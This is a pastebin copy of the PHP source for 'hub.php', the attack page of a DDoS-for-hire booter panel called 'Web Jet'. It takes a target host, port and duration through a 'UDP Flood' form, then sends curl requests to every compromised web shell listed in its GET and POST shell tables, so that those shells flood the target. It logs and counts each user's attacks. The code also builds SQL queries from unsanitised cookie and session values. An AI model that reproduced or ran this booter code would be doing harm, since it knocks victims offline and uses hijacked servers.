Don't like ads? PRO users don't see any ads ;-)
Public Pastes
Guest

hub

By: a guest on Aug 20th, 2012  |  syntax: None  |  size: 16.76 KB  |  hits: 28  |  expires: Never
download  |  raw  |  embed  |  report abuse  |  print
Text below is selected. Please press Ctrl+C to copy to your clipboard. (⌘+C on Mac)
  1. <?php
  2. require("header.php");
  3. ?>
  4.  
  5. <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
  6. <html xmlns="http://www.w3.org/1999/xhtml">
  7.  
  8. <head>
  9.  
  10.         <title>Attack</title>
  11.  
  12.         <meta http-equiv="Content-Type" content="text/html;charset=utf-8" />
  13.  
  14.         <meta name="keywords" content="" />    
  15.         <meta name="description" content="" />
  16.         <meta name="robots" content="" /><!-- change into index, follow -->
  17.                                
  18.         <link rel="stylesheet" href="stylesheets/style.css" type="text/css" />
  19.        
  20.         <!--[if lte IE 6]>
  21.                 <script type="text/javascript" src="javascripts/pngfix.js"></script>
  22.                 <script type="text/javascript" src="javascripts/ie6.js"></script>
  23.                 <link rel="stylesheet" href="stylesheets/ie6.css" type="text/css" />
  24.         <![endif]-->
  25.  
  26. </head>
  27.  
  28. <body>
  29.  
  30. <!--  / WRAPPER \ -->
  31. <div id="wrapper">
  32.        
  33.     <!--  / MAIN CONTAINER \ -->
  34.     <div id="mainCntr">
  35.  
  36.                 <!--  / HEADER CONTAINER \ -->
  37.                 <div id="headerCntr">
  38.                
  39.                         <h1><a href="#">Web Jet</a></h1>
  40.                          
  41.                         <!-- / MENU CONTAINER \ -->
  42.                         <div id="menuCntr">
  43.                        
  44.                                 <ul>
  45.                                         <li><a href="index.php">Home</a></li>
  46.                                         <li><a href="hub.php" class="active">DDoS Attack</a></li>
  47.                                         <li><a href="mysettings.php">My Account</a></li>
  48.                                         <li><a href="pinger.php">Pinger</a></li>
  49.                                         <li><a href="logout.php" onclick='return confirm("Are you sure you want to logout?");'>Logout</a></li>
  50.                                 </ul>
  51.                                
  52.                         </div>
  53.                         <!-- \  MENU CONTAINER  /-->
  54.                        
  55.                 </div>
  56.                 <!--  \ HEADER CONTAINER / -->
  57.                        
  58.                   <!--  / HAEDING BOX \ -->
  59.                 <div class="headingBox">
  60.                         <div class="heading">
  61.                        
  62.                         <h2>DDoS Attack</h2>
  63.                        
  64.                         </div>
  65.         </div>
  66.                 <!--  \ HAEDING BOX / -->
  67.                          
  68.        
  69.                
  70.         <!--  / CONTENT CONTAINER \ -->
  71.         <div id="contentCntr" class="background">
  72.                         <div class="center">
  73.                         <!--  / LEFT CONTAINER \ -->
  74.                         <div id="leftCntr">
  75.                                
  76.  
  77.                    
  78.                    
  79.                                         <!--  / OUR BLOG BOX \ -->
  80.                                         <div class="ourbloginnerBox">
  81.                                                 <div class="top">
  82.                                                         <div class="bottom">
  83.                                                                
  84.                    
  85.                    
  86.                    
  87.  
  88.  
  89.  
  90.  
  91.  
  92.  
  93.  
  94.  
  95. <div id="right">
  96. <div class="small-box"><h2>Welcome, <?php echo $username; ?>!</h2>
  97.     <div class="small-box-content">
  98.         <p>
  99.         Profile ID: <font color="#a5a5a5"><?php echo $id; ?></font> <br />
  100.         Rank: <font color="#a5a5a5"><?php echo $level; ?></font> <br />
  101.         My IP: <font color="#a5a5a5"><?php echo $_SERVER["REMOTE_ADDR"]; ?></font> <br />
  102.         My Attacks: <font color="#a5a5a5"><?php
  103.     $query = mysql_query("SELECT * FROM `users` WHERE id='$id' ");
  104.     while($row = mysql_fetch_array($query)){
  105.     $attacks = $row['myAttacks'];
  106.     echo $attacks;
  107.     }
  108. ?></font>
  109.         </p>
  110.  
  111.     </div></div>
  112.    
  113. <span style="line-height:1.2em;">
  114.         <div class="small-box"><h2>Members Statistics</h2>
  115.     <div class="small-box-content">
  116.         <p>
  117.  
  118.  
  119.                     <table width="100%" border="0" align="center" cellpadding="1" cellspacing="1" class="forms">
  120.                         <font size=1>
  121.           <tr>
  122.             <td><font color="#575757">Total Users</font></td>
  123.             <td><?php echo $all; ?></td></tr></font>
  124.          
  125.  
  126.           <tr>
  127.             <td><font color="#575757">Active Users</font></td>
  128.             <td><?php echo $active; ?></font></td>
  129.           </tr>
  130.  
  131.           <tr>
  132.             <td><font color="#575757">Pending Users</font></td>
  133.             <td><?php echo $total_pending; ?></font></td>
  134.           </tr>
  135.           <tr>
  136.             <td><font color="#575757">Total Attacks</font></td>
  137.             <td><?php
  138.                    $result = mysql_query("SELECT * FROM logs", $link);
  139.                    $num_rows4 = mysql_num_rows($result);
  140.                    echo "$num_rows4";
  141.                 ?></font></td>
  142.           </tr>
  143.                     </font>
  144.                     </table>
  145.         </p>
  146.  
  147.  
  148.     </div></div>
  149.  
  150.     <div class="small-box"><h2>Shells Statistics</h2>
  151.     <div class="small-box-content">
  152.         <p>
  153.  
  154.  
  155.                     <table width="100%" border="0" align="center" cellpadding="1" cellspacing="1" class="forms">
  156.                         <font size="1">
  157.                                       <tr>
  158.             <td><font color="#575757">Shell Rotation</font></td>
  159.             <?php
  160.             if($shellRotation == 0) { ?>
  161.             <td><font color="red">(Off)</font></td>
  162.             <?php } else { ?>
  163.             <td><font color="#00bc00">(On)</font></td>
  164.             <?php
  165.             }
  166.             ?>
  167.            
  168.           </tr>
  169.          
  170.           <tr>
  171.             <td><font color="#575757">Shells Online</font></td>
  172.             <td><font color="#00bc00"><?php echo $shellsOnline; ?></font></td>
  173.           </tr>
  174.  
  175.           <tr>
  176.             <td><font color="#575757">GET Shells</font></td>
  177.             <td><font color="#00bc00"><?php echo $num_rows; ?></font></td>
  178.           </tr>
  179.  
  180.           <tr>
  181.             <td><font color="#575757">POST Shells</font></td>
  182.             <td><font color="#00bc00"><?php echo $num_rows2; ?></font></td>
  183.           </tr>
  184.  
  185.           <tr>
  186.             <td><font color="#575757">Slowloris Shells</font></td>
  187.             <td><font color="#00bc00"><?php echo $num_rows3; ?></font></td>
  188.           </tr>
  189.                         </font>
  190.                     </table>
  191.         </p>
  192. </span>
  193.  
  194.     </div></div>
  195. </div>
  196.  
  197.                    
  198.                    
  199.                    
  200.                    
  201.  
  202.                                        
  203.                                                         </div>
  204.                                                 </div>   
  205.                                         </div>
  206.                                         <!--  / OUR BLOG BOX \ -->
  207.                                        
  208.                                         <!--  / OUR BLOG BOX \ -->
  209.  
  210.                                                                        
  211.  
  212.  
  213.                                                         <div class="ourbloginnerBox">
  214.                                                 <div class="top">
  215.                                                         <div class="bottom">
  216.                        
  217.                                                         <h2>Chat Member</h2>
  218.                                                        
  219.                                                         <object width="250" height="425" id="obj_1298661493293"><param name="movie" value="http://PostBooterchat.chatango.com/group"/><param name="wmode" value="transparent"/><param name="AllowScriptAccess" VALUE="always"/><param name="AllowNetworking" VALUE="all"/><param name="AllowFullScreen" VALUE="true"/><param name="flashvars" value="cid=1298661493293&b=60&f=50&l=999999&p=10&q=999999&r=100&s=1"/><embed id="emb_1298661493293" src="http://PostBooterchat.chatango.com/group" width="250" height="425" wmode="transparent" allowScriptAccess="always" allowNetworking="all" type="application/x-shockwave-flash" allowFullScreen="true" flashvars="cid=1298661493293&b=60&f=50&l=999999&p=10&q=999999&r=100&s=1"></embed></object><br>
  220.                            
  221.                            
  222.                        
  223.                                                         </div>
  224.                                                 </div>   
  225.                                         </div> 
  226.  
  227.  
  228.                                
  229.                     <p>&nbsp;</p>
  230.                                         <!--  / OUR BLOG BOX \ -->
  231.                                
  232.                         </div>
  233.                         <!--  \ LEFT CONTAINER / -->
  234.                        
  235.                         <!--  / RIGHT CONTAINER \ -->
  236.                         <div id="rightCntr">
  237.                                
  238.                                 <!--  / ABOUT BOX \ -->
  239.                                 <div class="aboutBox">
  240.                                 <h3><span>DDoS Attack</span></h3>
  241.                                 <p class="first"><strong>Donate</strong>: If you feel generous enough to donate to us, to make the booter stronger click the Donate tab ! -Thanks.</p>
  242.                
  243. </div>
  244.                                        
  245.                                 <p>
  246.                
  247.                
  248.              
  249.              
  250.              
  251.              
  252.  
  253.              
  254. <script src="javascript/jquery-1.4.4.min.js" type="text/javascript"></script>
  255. <script type="text/javascript">
  256. function hub()
  257.         {
  258.         if (window.XMLHttpRequest)
  259.           {
  260.           xmlhttp=new XMLHttpRequest();
  261.           }
  262.         else
  263.           {
  264.           xmlhttp=new ActiveXObject("Microsoft.XMLHTTP");
  265.           }
  266.         xmlhttp.onreadystatechange=function()
  267.           {
  268.           if (xmlhttp.readyState==4 && xmlhttp.status==200)
  269.             {
  270.             document.getElementById("sent").innerHTML = "Request has been sent to all shells.";
  271.             }
  272.           }
  273.         xmlhttp.open("GET","hub.php?host="+document.getElementById('host').value+"&time="+document.getElementById('time').value+"&port="+document.getElementById('port'));
  274.         xmlhttp.send();
  275. }
  276. </script>
  277. <div class="box">
  278.     <h2>&nbsp;</h2>
  279.     <h2>Important Notice</h2>
  280.     <p>&nbsp;</p>
  281.     <div class="box-content">
  282.   <p>
  283.             <font color="red"><center><strong>Important Notice</strong></font>: Attacking the same IP Address repeatedly will result in suspension of your account without refund.</center>
  284.         </p>
  285.     </div>
  286.  
  287. </div>
  288.  
  289. <div class="box">
  290.     <h2>&nbsp;</h2>
  291.     <h2>&nbsp;</h2>
  292.     <h2>Resolve Host to IP Address</h2>
  293.     <p>&nbsp;</p>
  294.     <div class="box-content">
  295.         <p>
  296.           <?php
  297. function printForm()
  298. {
  299. global $www;
  300.  
  301. $action = $_SERVER["PHP_SELF"];
  302.  
  303. print <<<ENDHTM
  304. <form method="post" action="$action">
  305. <p>http:// <input type="text" name="www" id="hello" value="$www"/> <input type="submit" value="Resolve" id="doLogin4" /></p>
  306. </form>
  307.  
  308. ENDHTM;
  309. }
  310.  
  311. if($_REQUEST['www'])
  312. {
  313. print $www;
  314.  
  315. $domain = strtolower($_REQUEST['www']);
  316. $xArray = @parse_url($domain);
  317.  
  318.         if(!$xArray["scheme"])
  319.         {
  320.         $domain = "http://" . $domain;
  321.         $xArray = @parse_url($domain);
  322.         }
  323.  
  324.         $xProtocol = $xArray["scheme"];
  325.         $xHost   = $xArray["host"];
  326.         $xPort   = $xArray["port"];
  327.         $xUser   = $xArray["user"];
  328.         $xPass   = $xArray["pass"];
  329.         $xPath   = $xArray["path"];
  330.         $xQuery  = $xArray["query"];
  331.         $xFragment = $xArray["fragment"];
  332.  
  333.         $domain = $xProtocol ."://". $xHost . $xPath . ($xQuery?"?":"") . $xQuery;
  334.         $www = $xHost . $xPath . ($xQuery?"?":"") . $xQuery;
  335.  
  336.         printForm();
  337.  
  338.                 if(@gethostbyname($xHost) == $xHost)
  339.                 {
  340.                 $ip2 = "Returned hostname";
  341.                 $hostname2 = "Cancelled";
  342.                 }
  343.                 else
  344.                 {
  345.                 $ip2 = @gethostbyname($xHost);
  346.                 $hostname2 = @gethostbyaddr($ip2);
  347.                 }
  348.         print "<div><p><strong><font color=\"black\">IP Address</font></strong>: $ip2</p></div>\n";
  349.         print "<div><p><strong><font color=\"black\">Hostname</font></strong>: $hostname2</p></div>\n";
  350. }
  351. else
  352. {
  353.                 if(isset($_COOKIE['URL']))
  354.                 {
  355.                 $www = $_COOKIE['URL'];
  356.                 }
  357. printForm();
  358. }
  359. ?>
  360.         </p>
  361.     </div>
  362. </div>
  363.  
  364. <div class="box">
  365. <h2>&nbsp;</h2>
  366. <h2>&nbsp;</h2>
  367. <h2>UDP Flood</h2>
  368. <p>&nbsp;</p>
  369. <div class="box-content">
  370. <p>
  371. <form>
  372.         <table width="50%" border="0" align="center" cellpadding="3" cellspacing="3" class="forms">
  373. <link rel="stylesheet" href="style1.css" type="text/css">
  374.  
  375.           <tr>
  376.             <td><p>IP/DNS</p>
  377.             <p>&nbsp;</p></td>
  378.             <td><p>
  379.               <input type="text" id="hello" onkeypress="handleKeyPress(event,this.form)" name="host" value=""/>
  380.             </p>
  381.             <p>&nbsp; </p></td>
  382.           </tr>
  383.  
  384.           <tr>
  385.             <td><p>Seconds</p>
  386.             <p>&nbsp;</p></td>
  387.             <td><p>
  388.               <input type="text" id="boby1" onkeypress="handleKeyPress(event,this.form)" name="time" value="30"/>
  389.             </p>
  390.             <p>&nbsp; </p></td>
  391.           </tr>
  392.  
  393.           <tr>
  394.             <td><p>Port</p>
  395.             <p>&nbsp;</p></td>
  396.             <td><p>
  397.        
  398.        
  399. <script type="text/javascript">
  400. function changeText(input)
  401. {
  402.      document.getElementById("boby").value = input.value;
  403. }
  404. </script>        
  405.            
  406. <input type="text" id="boby" onkeypress="handleKeyPress(event,this.form)" name="port" value="" > <br />
  407. <input type="radio" name="sex" value="3074" onclick="changeText(this)" /> Xbox Live
  408. <input type="radio" name="sex" value="80" onclick="changeText(this)" /> Website, Home Connection
  409. <input type="radio" name="sex" value="21" onclick="changeText(this)" /> FTP
  410. <input type="radio" name="sex" value="27015" onclick="changeText(this)" /> CSS Server
  411. <input type="radio" name="sex" value="6667" onclick="changeText(this)" /> IRC
  412.  
  413.  
  414.              
  415.             </p>
  416.             <p>&nbsp; </p></td>
  417.           </tr>
  418.  
  419.           <tr>
  420.             <td></td>
  421.             <td><input type="submit" value="Initiate Attack" onclick="hub();" id="doLogin3" /></td>
  422.           </tr>
  423.  
  424.       </table>
  425. <form>
  426.   </p>
  427. <form>
  428. </form>
  429.                  <form action="hub.php" method="post">
  430.                   &nbsp;
  431.                   </p>
  432.                  </form>
  433. <p id="sent"></p>
  434. <script type="text/javascript">
  435. function handleKeyPress(e,form){
  436.         var key=e.keyCode || e.which;
  437.         if (key==13){
  438.                 hub();
  439.         }
  440. }
  441. function handleEnterPress(e,form){
  442.         var key=e.keyCode || e.which;
  443.         if (key==13){
  444.                 getip();
  445.         }
  446. }
  447. </script>
  448. <?php
  449. set_time_limit(0);
  450. ignore_user_abort(TRUE);
  451.  
  452. include 'includes/EpiCurl.php';
  453. require("includes/ezSQLCore.php");
  454. require("includes/ezSQL.php");
  455.  
  456. $query = mysql_query("SELECT * FROM `users` WHERE `id`='$_SESSION[user_id]' AND `banned`=1") or die(mysql_error());
  457. if (mysql_num_rows($query) > 0) {
  458.         mysql_query("update `users`
  459.                 set `ckey`= '', `ctime`= ''
  460.                 where `id`='$_SESSION[user_id]' OR  `id` = '$_COOKIE[user_id]'") or die(mysql_error());
  461.         unset($_SESSION['user_id']);
  462.         unset($_SESSION['user_name']);
  463.         unset($_SESSION['user_level']);
  464.         unset($_SESSION['HTTP_USER_AGENT']);
  465.         session_unset();
  466.         session_destroy();
  467.         setcookie("user_id", '', time()-60*60*24*COOKIE_TIME_OUT, "/");
  468.         setcookie("user_name", '', time()-60*60*24*COOKIE_TIME_OUT, "/");
  469.         setcookie("user_key", '', time()-60*60*24*COOKIE_TIME_OUT, "/");
  470.         die("You do not have permission to view this page.");
  471. }
  472.  
  473. if (isset($_GET['host']) && isset($_GET['time']) && isset($_GET['port']))
  474. {
  475.  
  476.         $SQL = new ezSQL_mysql();
  477.         $SQL->connect(DB_USER, DB_PASS);
  478.         $SQL->select(DB_NAME);
  479.         $Query = "SELECT * FROM `getshells`";
  480.         $AffectedRows = $SQL->query($Query);
  481.         $host = $_GET['host'];
  482.         $time = intval($_GET['time']);
  483.         $port = intval($_GET['port']);
  484.         $mc = EpiCurl::getInstance();
  485.         $ch = array();
  486.  
  487.  
  488. if($time >= 181) {
  489. die("<hr>You cannot issue attacks exceeding 180 seconds.");
  490. }
  491.  
  492. if($host == "") {
  493. die("<center><strong><font color=\"red\">Sorry, but you must fill in all fields.</font></center></strong>");
  494. }
  495.  
  496. if($time == "") {
  497. die("<center><strong><font color=\"red\">Sorry, but you must fill in all fields.</font></center></strong>");
  498. }
  499.  
  500. if($port == "") {
  501. die("<center><strong><font color=\"red\">Sorry, but you must fill in all fields.</font></center></strong>");
  502. }
  503.  
  504. /*
  505. * Example Blacklisting
  506. */
  507.  
  508. if($host == "hackforums.net") { die("<hr>You cannot attack this."); }
  509. if($host == "64.120.186.69") { die("<hr>You cannot attack this."); }
  510.  
  511.  
  512. /*
  513. * End of blacklisting
  514. */
  515.  
  516.     for($i = 0; $i < $AffectedRows; $i++)
  517.     {
  518.         $row = $SQL->last_result[$i];
  519.         $shell = trim($row->URL);
  520.  
  521.         if (strlen($shell) == 0)
  522.             continue;
  523.  
  524.         $shell .= "?act=phptools&host={$host}&time={$time}&port={$port}";
  525.         $ch[$i] = curl_init($shell);
  526.         curl_setopt($ch[$i], CURLOPT_RETURNTRANSFER, 1);
  527.                 curl_setopt($ch[$i], CURLOPT_TIMEOUT, 7);
  528.         $curl1 = $mc->addCurl($ch[$i]);
  529.     }
  530.  
  531.         $Query = "SELECT * FROM `postshells`";
  532.         $AffectedRows = $SQL->query($Query);
  533.     $ch2 = array();
  534.     $post = "ip={$host}&time={$time}&port={$port}";
  535.  
  536.     for($i = 0; $i < $AffectedRows; $i++)
  537.     {
  538.                 $row = $SQL->last_result[$i];
  539.         $shell = trim($row->URL);
  540.         if (strlen($shell) == 0)
  541.             continue;
  542.         $header = array();
  543.                 $header[] = "Cache-Control: max-age=0";
  544.                 $header[] = "Connection: keep-alive";
  545.                 $header[] = "Keep-Alive: 300";
  546.                 $header[] = "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7";
  547.                 $header[] = "Accept-Language: en-us,en;q=0.5";
  548.                 $header[] = "Pragma: ";
  549.         $ch2[$i] = curl_init($shell);
  550.                 curl_setopt($ch2[$i], CURLOPT_HTTPHEADER, $header);
  551.         curl_setopt($ch2[$i], CURLOPT_RETURNTRANSFER, 1);
  552.         curl_setopt($ch2[$i], CURLOPT_FORBID_REUSE, 1);
  553.         curl_setopt($ch2[$i], CURLOPT_POST, 1);
  554.         curl_setopt($ch2[$i], CURLOPT_POSTFIELDS, $post);
  555.         $curl1 = $mc->addCurl($ch2[$i]);
  556.     }
  557.  
  558. echo "<p id='sent'><center><strong><font color=\"#00e300\">Attack has been sent!</font></strong></center></p>";
  559.  
  560. $username = $_SESSION['user_name'];
  561. $host = strip_tags(mysql_real_escape_string($_GET['host']));
  562. $time = strip_tags(mysql_real_escape_string($_GET['time']));
  563. $port = strip_tags(mysql_real_escape_string($_GET['port']));
  564. $date = date("m-d-Y, h:i:s a", time());
  565.  
  566. mysql_query("INSERT INTO logs
  567. (username, ip, time, port, date) VALUES('" . $username . "', '" .$host . "', '" . $time . "', '" . $port . "', '" . $date . "' ) ")
  568. or die(mysql_error());
  569.  
  570. mysql_query("UPDATE users set myAttacks = myAttacks + 1 WHERE full_name = '" . $username . "'") or die(mysql_error());
  571.  
  572. }
  573. ?>
  574.  
  575. </div>
  576. </div>
  577. </body>
  578. </html>
  579.  
  580. <br>
  581.              
  582.          <p>&nbsp;</p>
  583.          
  584.          <?php
  585. include 'footer.php';
  586. ?>
  587.              
  588.              
  589.  
  590.                
  591.                
  592.                 </p>
  593.                                 </div>
  594.              
  595.                                 <!--  / ABOUT BOX \ -->
  596.                                
  597.                                
  598.                         </div>
  599.                         <!--  \ RIGHT CONTAINER / -->  
  600.                        
  601.         </div>
  602.                 </div>
  603.         <!--  \ CONTENT CONTAINER / -->
  604.                
  605.         </div>
  606.         <!--  \ MAIN CONTAINER / -->
  607.        
  608.         <!--  / FOOTER CONTAINER \ -->
  609.        
  610.        
  611.        
  612.        
  613.        
  614.        
  615.        
  616.                  <?php
  617. include 'footer1.php';
  618. ?>
  619.        
  620.         <p>&nbsp;</p>
  621.        
  622.        
  623.        
  624.        
  625.        
  626.        
  627.         <!--  \ FOOTER CONTAINER / -->
  628.                
  629. </div>
  630. <!--  \ WRAPPER / -->
  631.  
  632. </body>
  633.  
  634. </html>
create a new version of this paste RAW Paste Data